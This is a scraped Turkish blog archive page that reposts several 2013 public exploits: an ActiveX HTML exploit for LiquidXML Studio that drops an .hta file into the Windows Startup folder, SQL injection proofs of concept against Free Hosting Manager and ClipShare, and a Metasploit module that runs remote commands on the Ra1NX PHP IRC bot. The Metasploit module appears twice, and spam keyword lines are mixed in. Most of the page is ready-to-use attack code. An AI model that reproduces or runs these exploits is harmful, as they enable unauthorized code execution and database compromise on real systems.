Archive for 25 Mart 2013

LiquidXML Studio 2010 ActiveX Remote 0-day

liquidXML-exploit

 

LiquidXML Studio 2010 ActiveX Remote 0-day Exploit

<html>
<object classid='clsid:E68E401C-7DB0-4F3A-88E1-159882468A79' id='target'/></object>
<script>
var sofa = "..\\..\\..\\..\\..\\..\\..\\..\\..\\Documents and Settings\\All Users\\Start Menu\\Programs\\Startup\\the_doctor_is_in.hta";
var king = "Oh noz, Look what Dr_IDE did...<" + "SCRIPT> var x=new ActiveXObject(\"WScript.Shell\"); x.Exec(\"CALC.EXE\"); <" +"/SCRIPT>";
target.OpenFile(sofa,1);
target.AppendString(king);
</script>
<body>
LiquidXML Studio 2010 ActiveX Insecure Method Executable File Creation 0-day<br>
By: Dr_IDE<br>
GUID: {E68E401C-7DB0-4F3A-88E1-159882468A79}<br>
Number of Interfaces: 1<br>
Default Interface: _FtpLibrary<br>
RegKey Safe for Script: False<br>
RegkeySafe for Init: False<br>
KillBitSet: False<br>
<br>
<br>
<br>
Been sitting on this one so long it could've hatched twice.
</body>
</html>

 

Free Hosting Manager V2.0.2 Multiple SQLi

Free Hosting Manager V2.0.2 Genel SQL injeçtion açığına ilişkin exploit

-------------------------------------------------------------------------
# Software      : Free Hosting Manager V2.0.2    Multiple SQLi                                                                                                          
# Author        : Saadat Ullah , saadi_linux@rocketmail.com                               
# Author home  : http://security-geeks.blogspot.com
# Date          : 23/3/13   
# Vendors  : http://www.fhm-script.com
# Download Link : http://www.fhm-script.com/download.php  
                                                                                     
-------------------------------------------------------------------------
 --- [ Multiple SQL injection] --- 
Its is vulnerable to SQLi on many file some of them are..

http://localhost/Free/clients/reset.php?code=[SQLi]
http://localhost/Free/clients/tickets.php?id=[SQLi]
http://localhost/free/clients/viewaccount.php?id=[SQLi]
Cookie based injeciton In 
http://localhost/free/clients/home.php
inject the cookie value clientuser
http://localhost/free/clients/register.php --->  SQLi on all POST Fields.

Proof Of Concept
In home.php
Calling a function auth() and what it is 

if ((isset($_COOKIE[&#39;clientuser&#39;])) && isset($_COOKIE[&#39;clientpass&#39;]) && isset($_COOKIE[&#39;clientid&#39;])) {

$clientuser = $_COOKIE[&#39;clientuser&#39;];
$clientpass = $_COOKIE[&#39;clientpass&#39;];
$clientid = $_COOKIE[&#39;clientid&#39;];
$this-> clientuser = $_COOKIE[&#39;clientuser&#39;];
$this-> clientpass = $_COOKIE[&#39;clientpass&#39;];
$this-> clientid = $_COOKIE[&#39;clientid&#39;];
return true;

$dbquery = @mysql_query("SELECT * FROM clients WHERE id=&#39;$clientid&#39; AND username=&#39;$clientuser&#39; AND password=&#39;$clientpass&#39;") or die(mysql_error());


In Reset.php
http://localhost/Free/clients/reset.php?code=[SQLi]

elseif ((isset($code)) || ($_GET[&#39;do&#39;] == "code")) {

$details = mysql_query("SELECT * FROM clientpwactivation WHERE activationcode=&#39;$code&#39;") 
or die(mysql_error());

In tickets.php
http://localhost/Free/clients/tickets.php?id=[SQLi]
if ((isset($_GET[&#39;id&#39;])) && ($_GET[&#39;action&#39;] == "close") && ($_GET[&#39;confirm&#39;] == "true")) {
$fhm-> closeticket($_GET[&#39;id&#39;]);
.
.
$checkticket = mysql_query("SELECT * FROM tickets WHERE id=&#39;$ticket&#39; AND clientid=&#39;$this-> clientid&#39;") or die(mysql_error());

In Viewaccount.php
http://localhost/free/clients/viewaccount.php?id=[SQLi]

$id = $_GET[&#39;id&#39;];
.
$getacct = mysql_query("SELECT * FROM orders WHERE id=&#39;$id&#39; AND clientid=&#39;$fhm-> clientid&#39;") or die(mysql_error());

In register.php

$firstname = stripslashes($_POST[&#39;first_name&#39;]);
$lastname = stripslashes($_POST[&#39;last_name&#39;]);
$company = stripslashes($_POST[&#39;company&#39;]);
$address = stripslashes($_POST[&#39;address&#39;]);
$address2 = stripslashes($_POST[&#39;address_2&#39;]);
$country = stripslashes($_POST[&#39;country&#39;]);
$city = stripslashes($_POST[&#39;city&#39;]);
$state = stripslashes($_POST[&#39;state_region&#39;]);
$postcode = stripslashes($_POST[&#39;postal_code&#39;]);
$telnumber = stripslashes($_POST[&#39;tel_number&#39;]);
$faxnumber = stripslashes($_POST[&#39;fax_number&#39;]);
$emailaddress = stripslashes($_POST[&#39;email_address&#39;]);
$username = stripslashes($_POST[&#39;username&#39;]);
$password1 = stripslashes($_POST[&#39;password&#39;]);
$password2 = stripslashes($_POST[&#39;confirm_password&#39;]);
.
.
.
.
.
.
$insertuser = mysql_query("INSERT INTO clients VALUES(&#39;&#39;, &#39;$username&#39;, &#39;$md5pass&#39;, &#39;$firstname&#39;, &#39;$lastname&#39;, &#39;$company&#39;, &#39;$address&#39;, &#39;$address2&#39;, &#39;$city&#39;, &#39;$country&#39;, &#39;$state&#39;, &#39;$postcode&#39;, &#39;$telnumber&#39;, &#39;$faxnumber&#39;, &#39;$emailaddress&#39;, &#39;$startingcredits&#39;, &#39;1&#39;, &#39;&#39;, &#39;&#39;, &#39;$timestamp&#39;) ") 

Only using stripslahes which will not protect against doing sql injection attack.

#independent Pakistani Security Researcher


  

ClipShare 4.1.1 (gmembers.php, gid param) – Blind SQL Injection Vulnerability

ClipShare 4.1.1 (gmembers.php, gid param) – Blind SQL Injection açığına ilişkin exploit

# Exploit Title: ClipShare 4.1.1 (gmembers.php) Blind SQL Injection Vulnerability
# Exploit Author: Esac
# Vulnerable Software: ClipShare - Video Sharing Community Script 4.1.4
# Official site: http://www.clip-share.com
# Software License: Commercial.
#all versions are vulnerable:
#Note : this vulnerable work just if there is a group added to the community 
#Last Checked: 24 March 2013

#to exploit this vulnerability MAGIC_QUOTES_GPC directive must be turned off on server side.(php.ini)

==============================================================================================

#Vulnerable Script:
PHP script : members.php  on line 23 

=========================== BEGIN OF gmembers.php =============================================

 <?php
/************************************************************************************************
| Software Name        : ClipShare - Video Sharing Community Script
| Software Author      : Clip-Share.Com / ScriptXperts.Com
| Website              : http://www.clip-share.com
| E-mail               : office@clip-share.com
|**************************************************************************************************
| This source file is subject to the ClipShare End-User License Agreement, available online at:
| http://www.clip-share.com/video-sharing-script-eula.html
| By using this software, you acknowledge having read this Agreement and agree to be bound thereby.
|**************************************************************************************************
| Copyright (c) 2006-2007 Clip-Share.com. All rights reserved.
|**************************************************************************************************/

require(&#39;include/config.php&#39;);
require(&#39;include/function.php&#39;);
require(&#39;classes/pagination.class.php&#39;);
require(&#39;language/&#39; .$_SESSION&#91;&#39;language&#39;&#93;. &#39;/gmembers.lang.php&#39;);

$gname  = NULL;
$gurl   = NULL;
$oid    = NULL;
$gid    = ( isset($_REQUEST&#91;&#39;gid&#39;&#93;) && is_numeric($_REQUEST&#91;&#39;gid&#39;&#93;) ) ? mysql_real_escape_string($_REQUEST&#91;&#39;gid&#39;&#93;) : NULL;
$sql    = "SELECT * FROM group_own WHERE GID=&#39;" .$gid. "&#39; limit 1";
$rs     = $conn-> execute($sql);
if ( $conn-> Affected_Rows() == 1 ) {
    $urlkey     = $rs-> fields[&#39;gurl&#39;];
    $gname      = $rs-> fields[&#39;gname&#39;];
    $gupload    = $rs-> fields[&#39;gupload&#39;];
    $oid        = $rs-> fields[&#39;OID&#39;];
    STemplate::assign(&#39;gname&#39;, $gname);
    STemplate::assign(&#39;gurl&#39;, $urlkey);
    STemplate::assign(&#39;gupload&#39;, $gupload);
} else {
    session_write_close();
    header(&#39;Location: &#39; .$config[&#39;BASE_URL&#39;]. &#39;/error.php?type=group_missing&#39;);
    die();
}
...........................................;
...............................................
 
?> 

============================================================================================================


 
Poc :

http://server/mavideo/gmembers.php?gid=6 [Blind SQLi]

Real exploitation :

 http://server/mavideo/gmembers.php?gid=6 AND 1=1
==>  return normal page

http://server/mavideo/gmembers.php?gid=6 AND 1=2
==>  return page with some errors ( or with nothing - white page )



--------------------------------------------------------------------------------------
PwnEd.
Tested version:
Sunday , March 24, 2013 | Version: 4.1.4 | Username: admin | Logout
Copyright © 2006-2008 ClipShare. All rights reserved.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Greetz : White Tarbouch Team

./Esac

"Ra1NX" PHP Bot pubcall Authentication Bypass Remote Code Execution

“Ra1NX” PHP Bot pubcall Authentication Bypass Uzaktan Kod Çalıştırma Açığı

# Exploit Title: "Ra1NX" PHP Bot pubcall Authentication Bypass Remote Code Execution
# Date: March 24, 2013
# Exploit Author: bwall
# Software Link: https://defense.ballastsecurity.net/decoding/index.php?hash=69401ac90262f3855c23cd143d7d2ae0
# Version: v2.0
# Tested on: Ubuntu

require &#39;msf/core&#39;

class Metasploit3  < Msf::Exploit::Remote

	include Msf::Exploit::Remote::Tcp

	def initialize(info = {})
		super(update_info(info,
			&#39;Name&#39;           =>  &#39;"Ra1NX" PHP Bot pubcall Authentication Bypass Remote Code Execution&#39;,
			&#39;Description&#39;    =>  %q{
					This module allows remote command execution on the PHP IRC bot Ra1NX by
					using the public call feature in private message to covertly bypass the
					authentication system.
				},
			&#39;Author&#39;         =>
				[
					&#39;bwall  <bwall[at]openbwall.com> &#39; # Ra1NX analysis and Metasploit module
				],
			&#39;License&#39;        =>  MSF_LICENSE,
			&#39;References&#39;     =>
				[
					[&#39;URL&#39;, &#39;https://defense.ballastsecurity.net/wiki/index.php/Ra1NX_bot&#39;],
					[&#39;URL&#39;, &#39;https://defense.ballastsecurity.net/decoding/index.php?hash=69401ac90262f3855c23cd143d7d2ae0&#39;],
					[&#39;URL&#39;, &#39;http://ddecode.com/phpdecoder/?results=8c6ba611ea2a504da928c6e176a6537b&#39;]
				],
			&#39;Platform&#39;       =>  [ &#39;unix&#39;, &#39;win&#39;],
			&#39;Arch&#39;           =>  ARCH_CMD,
			&#39;Payload&#39;        =>
				{
					&#39;Space&#39;    =>  344,
					&#39;BadChars&#39; =>  &#39;&#39;,
					&#39;DisableNops&#39; =>  true,
					&#39;Compat&#39;      =>
						{
							&#39;PayloadType&#39; =>  &#39;cmd&#39;,
						}
				},
			&#39;Targets&#39;  =>
				[
					[ &#39;Ra1NX&#39;, { } ]
				],
			&#39;Privileged&#39;     =>  false,
			&#39;DisclosureDate&#39; =>  &#39;March 24 2013&#39;,
			&#39;DefaultTarget&#39;  =>  0))

		register_options(
			[
				Opt::RPORT(6667),
				OptString.new(&#39;IRC_PASSWORD&#39;, [false, &#39;IRC Connection Password&#39;, &#39;&#39;]),
				OptString.new(&#39;NICK&#39;, [true, &#39;IRC Nickname&#39;, &#39;msf_user&#39;]),
				OptString.new(&#39;RNICK&#39;, [true, &#39;Nickname of Target IRC Bot&#39;, &#39;jhl1&#39;]),
				OptString.new(&#39;PHP_EXEC&#39;, [true, &#39;Function used to call payload&#39;, &#39;system&#39;])
			], self.class)
	end

	def check
		connect

		response = register(sock)
		if response =~ /463/ or response =~ /464/
			print_error("#{rhost}:#{rport} - Connection to the IRC Server not allowed")
			return Exploit::CheckCode::Unknown
		end
		confirm_string = rand_text_alpha(8)
		response = send_msg(sock, "PRIVMSG #{datastore[&#39;RNICK&#39;]} :#{datastore[&#39;RNICK&#39;]} @msg #{datastore[&#39;NICK&#39;]} #{confirm_string}rn")
		print response
		quit(sock)
		disconnect

		if response =~ /#{confirm_string}/
			return Exploit::CheckCode::Vulnerable
		else
			return Exploit::CheckCode::Safe
		end
	end

	def send_msg(sock, data)
		sock.put(data)
		data = ""
		begin
			read_data = sock.get_once(-1, 1)
			while not read_data.nil?
				data  < < read_data
				read_data = sock.get_once(-1, 1)
			end
		rescue EOFError
		end
		data
	end

	def register(sock)
		msg = ""

		if datastore[&#39;IRC_PASSWORD&#39;] and not datastore[&#39;IRC_PASSWORD&#39;].empty?
			msg  < < "PASS #{datastore[&#39;IRC_PASSWORD&#39;]}rn"
		end

		if datastore[&#39;NICK&#39;].length >  9
			nick = rand_text_alpha(9)
			print_error("The nick is longer than 9 characters, using #{nick}")
		else
			nick = datastore[&#39;NICK&#39;]
		end

		msg  < < "NICK #{nick}rn"
		msg  < < "USER #{nick} #{Rex::Socket.source_address(rhost)} #{rhost} :#{nick}rn"

		response = send_msg(sock,msg)
		return response
	end

	def ra1nx_command(sock)
		encoded = payload.encoded
		command_msg = "PRIVMSG #{datastore[&#39;RNICK&#39;]} :#{datastore[&#39;RNICK&#39;]} @#{datastore[&#39;PHP_EXEC&#39;]} #{encoded}rn"
		response = send_msg(sock, command_msg)
		return response
	end

	def quit(sock)
		quit_msg = "QUIT :bye byern"
		sock.put(quit_msg)
	end

	def exploit
		connect

		print_status("#{rhost}:#{rport} - Registering with the IRC Server...")
		response = register(sock)
		if response =~ /463/ or response =~ /464/
			print_error("#{rhost}:#{rport} - Connection to the IRC Server not allowed")
			return
		end

		print_status("#{rhost}:#{rport} - Exploiting the Ra1NX bot...")
		ra1nx_command(sock)

		quit(sock)
		disconnect
	end
end

“Ra1NX” PHP Bot pubcall Authentication Bypass Remote Code Execution

“Ra1NX” PHP Bot pubcall Authentication Bypass Uzaktan Kod Çalıştırma Açığı
porno izle
porno indir

# Exploit Title: "Ra1NX" PHP Bot pubcall Authentication Bypass Remote Code Execution
# Date: March 24, 2013
# Exploit Author: bwall
# Software Link: https://defense.ballastsecurity.net/decoding/index.php?hash=69401ac90262f3855c23cd143d7d2ae0
# Version: v2.0
# Tested on: Ubuntu

require &#39;msf/core&#39;

class Metasploit3  < Msf::Exploit::Remote

	include Msf::Exploit::Remote::Tcp

	def initialize(info = {})
		super(update_info(info,
			&#39;Name&#39;           =>  &#39;"Ra1NX" PHP Bot pubcall Authentication Bypass Remote Code Execution&#39;,
			&#39;Description&#39;    =>  %q{
					This module allows remote command execution on the PHP IRC bot Ra1NX by
					using the public call feature in private message to covertly bypass the
					authentication system.
				},
			&#39;Author&#39;         => 
				[
					&#39;bwall  <bwall[at]openbwall.com> &#39; # Ra1NX analysis and Metasploit module
				],
			&#39;License&#39;        =>  MSF_LICENSE,
			&#39;References&#39;     => 
				[
					[&#39;URL&#39;, &#39;https://defense.ballastsecurity.net/wiki/index.php/Ra1NX_bot&#39;],
					[&#39;URL&#39;, &#39;https://defense.ballastsecurity.net/decoding/index.php?hash=69401ac90262f3855c23cd143d7d2ae0&#39;],
					[&#39;URL&#39;, &#39;http://ddecode.com/phpdecoder/?results=8c6ba611ea2a504da928c6e176a6537b&#39;]
				],
			&#39;Platform&#39;       =>  [ &#39;unix&#39;, &#39;win&#39;],
			&#39;Arch&#39;           =>  ARCH_CMD,
			&#39;Payload&#39;        => 
				{
					&#39;Space&#39;    =>  344,
					&#39;BadChars&#39; =>  &#39;&#39;,
					&#39;DisableNops&#39; =>  true,
					&#39;Compat&#39;      => 
						{
							&#39;PayloadType&#39; =>  &#39;cmd&#39;,
						}
				},
			&#39;Targets&#39;  => 
				[
					[ &#39;Ra1NX&#39;, { } ]
				],
			&#39;Privileged&#39;     =>  false,
			&#39;DisclosureDate&#39; =>  &#39;March 24 2013&#39;,
			&#39;DefaultTarget&#39;  =>  0))

		register_options(
			[
				Opt::RPORT(6667),
				OptString.new(&#39;IRC_PASSWORD&#39;, [false, &#39;IRC Connection Password&#39;, &#39;&#39;]),
				OptString.new(&#39;NICK&#39;, [true, &#39;IRC Nickname&#39;, &#39;msf_user&#39;]),
				OptString.new(&#39;RNICK&#39;, [true, &#39;Nickname of Target IRC Bot&#39;, &#39;jhl1&#39;]),
				OptString.new(&#39;PHP_EXEC&#39;, [true, &#39;Function used to call payload&#39;, &#39;system&#39;])
			], self.class)
	end

	def check
		connect

		response = register(sock)
		if response =~ /463/ or response =~ /464/
			print_error("#{rhost}:#{rport} - Connection to the IRC Server not allowed")
			return Exploit::CheckCode::Unknown
		end
		confirm_string = rand_text_alpha(8)
		response = send_msg(sock, "PRIVMSG #{datastore[&#39;RNICK&#39;]} :#{datastore[&#39;RNICK&#39;]} @msg #{datastore[&#39;NICK&#39;]} #{confirm_string}rn")
		print response
		quit(sock)
		disconnect

		if response =~ /#{confirm_string}/
			return Exploit::CheckCode::Vulnerable
		else
			return Exploit::CheckCode::Safe
		end
	end

	def send_msg(sock, data)
		sock.put(data)
		data = ""
		begin
			read_data = sock.get_once(-1, 1)
			while not read_data.nil?
				data  < < read_data
				read_data = sock.get_once(-1, 1)
			end
		rescue EOFError
		end
		data
	end

	def register(sock)
		msg = ""

		if datastore[&#39;IRC_PASSWORD&#39;] and not datastore[&#39;IRC_PASSWORD&#39;].empty?
			msg  < < "PASS #{datastore[&#39;IRC_PASSWORD&#39;]}rn"
		end

		if datastore[&#39;NICK&#39;].length >  9
			nick = rand_text_alpha(9)
			print_error("The nick is longer than 9 characters, using #{nick}")
		else
			nick = datastore[&#39;NICK&#39;]
		end

		msg  < < "NICK #{nick}rn"
		msg  < < "USER #{nick} #{Rex::Socket.source_address(rhost)} #{rhost} :#{nick}rn"

		response = send_msg(sock,msg)
		return response
	end

	def ra1nx_command(sock)
		encoded = payload.encoded
		command_msg = "PRIVMSG #{datastore[&#39;RNICK&#39;]} :#{datastore[&#39;RNICK&#39;]} @#{datastore[&#39;PHP_EXEC&#39;]} #{encoded}rn"
		response = send_msg(sock, command_msg)
		return response
	end

	def quit(sock)
		quit_msg = "QUIT :bye byern"
		sock.put(quit_msg)
	end

	def exploit
		connect

		print_status("#{rhost}:#{rport} - Registering with the IRC Server...")
		response = register(sock)
		if response =~ /463/ or response =~ /464/
			print_error("#{rhost}:#{rport} - Connection to the IRC Server not allowed")
			return
		end

		print_status("#{rhost}:#{rport} - Exploiting the Ra1NX bot...")
		ra1nx_command(sock)

		quit(sock)
		disconnect
	end
end